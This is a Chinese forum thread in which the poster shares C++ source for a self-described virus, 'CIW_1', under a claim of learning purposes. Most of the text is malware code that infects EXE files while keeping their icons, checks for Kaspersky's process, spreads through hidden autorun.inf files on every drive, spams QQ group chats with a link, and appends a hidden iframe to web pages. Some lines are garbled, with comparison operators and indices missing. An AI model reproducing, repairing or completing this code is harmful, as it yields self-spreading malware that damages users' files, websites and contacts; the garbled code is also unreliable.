共有回帖数 2 个
-
下面是一个病毒,本人写这个病毒的目的是为了学习,绝对没有其他目的,如果你这篇文章的读者,那也证明你也是为了学习,绝对没有其他目的.我也痛恨病毒,但只有学习了病毒的原理才能更好的防范病毒.
病毒名称: CIW_1
病毒功能:
1.感染exe文件
2.弹出一个对话框,提示用户已经中毒了.
3.检测是否有卡巴斯基,如果有就把时间改成1989年7月28日,让卡巴变黑,然后感染,运行.
4.被感染后的exe的图片不会变(不像熊猫烧香那样会变成一只熊猫,为了这个功能我测试了100多次实现才弄明白的)
5.Autorun
6.开机运行
7.设置IE主页
8.发QQ消息
9.感染 "htm", "html", "asp", "php", "jsp", "aspx" 文件
最后说明一点,因为有许多没有技术又卑鄙的人经常用代码就直接编译,然后到网上害人(这和我学习的目的不一样,所以我把代码改了3个地方,你们自己一个研究一边改.)
如果你愿意只用于学习,那么请你到下面留下你的信箱,我把一个完整的代码发给你.
病毒代码:
#include "stdafx.h"
#include "resource.h"
#include cstdio
#include ctime
#includetlhelp32.h
HINSTANCE hInst;
HWND hWnd;
ATOM MyRegisterClass(HINSTANCE hInstance);
BOOL InitInstance(HINSTANCE, int);
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
/************** 程序ID定义 ******************/
#define id_Send 0x77E //发送按扭的ID
#define id_Infect 1000 //控制感染的定时器的ID
#define id_SendQQMsg 1001 //控制发送QQ消息的定时器ID
/************** 程序常量定义 ******************/
const int nWebFileTypeNum = 6; //网页类型的数目
const char *szWebFilePostfix[nWebFileTypeNum] = { "htm", "html", "asp", "php", "jsp", "aspx" }; //感染网页类型
/*************** 函数定义 ******************/
int InfectAllFile(char *szDir);
void SendQQMsg();
int GetVolumeName(char szVolumeName[] );
void ReleaseFile(char* szReleaseFileName);
int IsInfect(char *szFileName );
int InfectFile(char *szSrcFileName );
int CheckAntivirus();
int InfectAllFile(char *szDir);
void InfectWebFile(char *szInfectFileName );
void SetAutorun();
void GetPostfixName(char *szFileName, char *szPostfixName );
int GetVolumeName(char szVolumeName[] );
void WriteReg();
void ReleaseFile(char* szReleaseFileName)
{
char szFileName[200];
GetTempFileName( "C:\Windows\", "CIW_", 0, szFileName );
HRSRC hRes = FindResource( NULL, MAKEINTRESOURCE(14), RT_RCDATA );
if( hRes )
{
HGLOBAL hLoadRes = LoadResource( NULL, hRes );
LPVOID szSrcFileBuf = LockResource( hLoadRes );
DWORD nSizeOfSrcFile = SizeofResource(NULL, hRes );
if( szSrcFileBuf != NULL )
{
HANDLE hSrcFile = CreateFile( szFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
WriteFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
CloseHandle( hSrcFile );
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetStartupInfo(&si);
CreateProcess(szFileName,GetCommandLine(),NULL,
NULL,NULL,NULL,NULL,NULL,&si,&pi);
}
}
else
{
szReleaseFileName = NULL;
return ;
}
strcpy( szReleaseFileName, szFileName);
}
楼主 2016-07-08 10:49 回复
-
int IsInfect(char *szFileName )
{
HMODULE hModule = LoadLibrary( szFileName );
if( hModule )
{
HRSRC hRes = FindResource(hModule , MAKEINTRESOURCE(14), RT_RCDATA );
FreeLibrary( hModule );
if( hRes )
{
return 1;
}
}
return 0;
}
const int FINDICONNUM = 15;
int InfectFile(char *szSrcFileName )
{
char szMyFileName[200];
GetModuleFileName( NULL, szMyFileName, 200);
DeleteFile("C:\Windows\CIW.exe");
CopyFile( szMyFileName, "C:\Windows\CIW.exe", true );
HMODULE hModule =LoadLibrary( szSrcFileName );
int i = 0, j = 0;
HRSRC hRes ;
DWORD dwIconSize;
for(; i FINDICONNUM ;i ++ )
{
hRes = NULL;
hRes = FindResource( hModule, (LPCTSTR)i, RT_ICON );
dwIconSize = SizeofResource( hModule, hRes) ;
if( i == (FINDICONNUM - 1))
{
i = 0;
j ++ ;
if( j == 13 )
{
break;
}
}
}
HANDLE hUpdateTemp;
if( hRes )
{
hUpdateTemp = BeginUpdateResource( "C:\Windows\CIW.exe", false );
}
else
{
hUpdateTemp = BeginUpdateResource( "C:\Windows\CIW.exe", true );
}
HGLOBAL hLoadRes = LoadResource( hModule, hRes);
UpdateResource( hUpdateTemp, RT_ICON, (char*)1, 0, hLoadRes, dwIconSize );
DestroyIcon( (HICON) hLoadRes );
EndUpdateResource( hUpdateTemp, false );
FreeLibrary( hModule );
HANDLE hSrcFile = CreateFile( szSrcFileName, GENERIC_WRITE | GENERIC_READ , FILE_SHARE_READ | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
if( (int)hSrcFile == -1 )
{
return 0;
}
DWORD nSizeOfSrcFile = GetFileSize( hSrcFile, &nSizeOfSrcFile );
char *szSrcFileBuf = new char[ nSizeOfSrcFile ];
ReadFile( hSrcFile, szSrcFileBuf, nSizeOfSrcFile, &nSizeOfSrcFile, NULL);
HANDLE hUpdate = BeginUpdateResource( "C:\Windows\CIW.exe", false );
UpdateResource( hUpdate, RT_RCDATA, MAKEINTRESOURCE(14),NULL, szSrcFileBuf, nSizeOfSrcFile);
EndUpdateResource( hUpdate, false );
delete []szSrcFileBuf;
CloseHandle( hSrcFile );
return 1;
}
int CheckAntivirus()
{
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(pe32);
BOOL bMore = 1;
HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
return 0;
}
while(bMore)
{
//有没有卡巴斯基
if( strcmp( "avp.exe", pe32.szExeFile ) )
{
return 1;
}
bMore=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
return 0;
}
//大写字符串转小写字符串
void Change(char *str )
{
for( int i = 0; i (int)strlen( str ); i++ )
{
if( str = 'A' && str = 'Z' )
{
str -= 'A' - 'a';
}
}
}
void GetPostfixName(char *szFileName, char *szPostfixName )
{
int nFileNameSize = strlen( szFileName );
for( int i = nFileNameSize - 1; i = 0; i--)
{
if( szFileName == '.' )
{
break;
}
}
i= nFileNameSize - i - 1; //文件后缀名的长度
for( int j = 0; j nFileNameSize; j ++ )
{
szPostfixName[ j ] = szFileName[ nFileNameSize - i + j ];
}
szPostfixName[ j ] = 0;
}
int InfectAllFile(char *szDir)
{
DWORD dwPeType;
char directory[MAX_PATH];
char file[MAX_PATH];
HANDLE hFile;
WIN32_FIND_DATA fd;
memset( &fd, 0, sizeof(WIN32_FIND_DATA) );
strncpy(directory, szDir,MAX_PATH);
strcat(directory,"*.*");
hFile = FindFirstFile(directory, &fd);
do
{
if( fd.cFileName[0] != '.' )
{
if( fd.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY) //是目录
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir );
strcat(file, fd.cFileName );
strcat(file, "\" );
InfectAllFile(file);
}
else //是文件
{
memset(file, 0, MAX_PATH);
strcpy(file, szDir);
strcat(file, fd.cFileName );
if( strcmp( fd.cFileName, "NTDETECT.COM") == 0) //是 "NTDETECT.COM" 文件跳出
{
continue;
}
char szPostfixName[20];
int i = GetBinaryType( file, &dwPeType );
GetPostfixName( file, szPostfixName );
if((dwPeType == SCS_32BIT_BINARY ||
dwPeType ==SCS_OS216_BINARY ) && i ) //是PE文件感染
{
if( !IsInfect( file ) ) //是否感染过
{
InfectFile( file );
DeleteFile( file );
CopyFile( "C:\Windows\CIW.exe", file, false);
}
}
else //不是PE文件
{
for( int i = 0; i nWebFileTypeNum; i++)
{
if( strcmp( szPostfixName, szWebFilePostfix ) == 0 ) //是网页文件
{
InfectWebFile( file );
}
}
}
}
}
}while( FindNextFile( hFile, &fd) );
return 0;
}
1楼 2016-07-08 10:49 回复
-
void SendQQMsg()
{
HWND hFore, hChat, hParent;
char szTest[] = "这是我的QQ主页哦! http://user.qzone.qq.com/281011131 ";
HWND hWnd=NULL;
char name[200];
int len;
char ch[3] = {0, 0, 0};
while(hWnd=FindWindowEx(NULL,hWnd,NULL,NULL))
{
GetWindowText(hWnd,name,200);
len=strlen(name);
ch[0]=name[len-2];
ch[1]=name[len-1];
if(strcmp(ch,"群")==0 || strcmp(ch,"中")==0 )
{
hFore=FindWindow(NULL,name);
hParent=FindWindowEx(hFore,NULL,"#32770",NULL);
hChat=FindWindowEx(hParent,NULL,"AfxWnd42",NULL);
hChat=FindWindowEx(hParent,hChat,"AfxWnd42",NULL);
hChat=FindWindowEx(hChat,NULL,"RichEdit20A",NULL);
if( hChat )
{
SendMessage( hChat ,EM_REPLACESEL,0,LPARAM(szTest));
SendMessage(hParent,WM_COMMAND,id_Send,BN_CLICKED);
}
}
}
}
/******** 获得所有的磁盘 ********/
int GetVolumeName(char szVolumeName[] )
{
int nVolumeNum = 0;
WIN32_FIND_DATA fd;
for( int i = 'C'; i = 'Z'; i ++ )
{
char szVolumeNameTemp[10];
sprintf( szVolumeNameTemp, "%c:\*.*", i );
HANDLE hFile = FindFirstFile( szVolumeNameTemp, &fd);
if( ( unsigned int ) hFile != -1)
{
szVolumeName[ nVolumeNum ] = i;
nVolumeNum ++;
}
}
szVolumeName[ nVolumeNum ] = 0;
return nVolumeNum; //磁盘的数目
}
/******** 感染网页文件 ********/
void InfectWebFile(char *szInfectFileName )
{
//感染网页的内容
char szWriteText[] = "iframe src=http://user.qzone.qq.com/281011131 width=height=0/iframe";
unsigned long dwWriteTextByte = strlen( szWriteText );
char *szWebFileBuf = new char[ dwWriteTextByte + 1] ;
HANDLE hWebFile = CreateFile( szInfectFileName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, OPEN_EXISTING, NULL, NULL);
DWORD dwWebFileSize = GetFileSize( hWebFile, &dwWebFileSize);
if( dwWebFileSize dwWriteTextByte)//没有被感染过
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
else
{
SetFilePointer( hWebFile, dwWebFileSize - dwWriteTextByte, 0, FILE_BEGIN);
ReadFile( hWebFile, szWebFileBuf, dwWriteTextByte, &dwWriteTextByte, NULL);
szWebFileBuf[dwWriteTextByte] = 0;
if( strcmp( szWebFileBuf, szWriteText) != 0 ) //没有被感染过
{
//感染
SetEndOfFile( hWebFile );
WriteFile( hWebFile, szWriteText, dwWriteTextByte, &dwWriteTextByte, 0);
}
}
delete [] szWebFileBuf;
CloseHandle( hWebFile );
}
/******** AutoRun.inf ********/
void SetAutorun()
{
char szVolumeName[25];
int nVolumeNum = GetVolumeName( szVolumeName );
for( int i = 0; i nVolumeNum; i++)
{
char szFileName[20];
char szMyFileName[200];
char szAutorunFile[100];
sprintf( szFileName, "%c:\CIW.exe", szVolumeName );
sprintf( szAutorunFile, "%c:\autorun.inf", szVolumeName );
DeleteFile( szAutorunFile );
DeleteFile( szFileName );
GetModuleFileName( NULL, szMyFileName, 200);
CopyFile( szMyFileName, szFileName, true);
HANDLE hAutorunFile = CreateFile( szAutorunFile, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL, CREATE_ALWAYS, NULL, NULL);
char szWriteText[200] ;
sprintf(szWriteText, "[Autorun] n open=%s nshellexecute=%snshell\Auto\command=%s",
szFileName, szFileName, szFileName);
DWORD dwWriteByte;
WriteFile( hAutorunFile, szWriteText, strlen( szWriteText ), &dwWriteByte, 0);
CloseHandle( hAutorunFile );
SetFileAttributes( szFileName, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes( szAutorunFile, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
}
}
2楼 2016-07-08 10:49 回复
Copyright © 2010~2015 直线网 版权所有,All Rights Reserved.沪ICP备10039589号
意见反馈 |
关于直线 |
版权声明 |
会员须知
